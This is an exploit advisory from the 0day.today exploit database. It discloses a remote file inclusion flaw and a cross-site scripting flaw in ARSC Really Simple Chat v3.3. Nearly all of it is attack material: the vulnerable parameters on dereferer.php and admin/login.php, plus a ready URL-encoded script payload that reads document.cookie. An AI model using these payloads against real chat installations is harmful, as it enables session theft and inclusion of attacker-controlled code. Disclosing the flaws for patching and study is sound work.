[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ARSC Really Simple Chat v3.3 Remote File Inclusion & XSS Vulnerability

Author
Zer0 Thunder
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12939
Category
web applications
Date add
25-06-2010
Platform
php
======================================================================
ARSC Really Simple Chat v3.3 Remote File Inclusion & XSS Vulnerability
======================================================================


=> ARSC Really Simple Chat V3.3 Remote File Inclsion & Cross Site Scripting Vulnerability
=> Author    : Zer0 Thunder
=> Home      : http://colombohackers.com
=> Download  : http://sourceforge.net/projects/arsc/
=> Date  : 06/25/2010
 
 
Remote File Inclusion
---
 
http://localhost/arsc3.3-pre2/base/dereferer.php?arsc_link=[RFI]
 
 
XSS Call
--------
 
http://localhost/arsc3.3-pre2/base/admin/login.php?arsc_message=[XSS]
 
 
Example :
http://localhost/arsc3.3-pre2/base/admin/login.php?arsc_message=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E



#  0day.today [2024-11-15]  #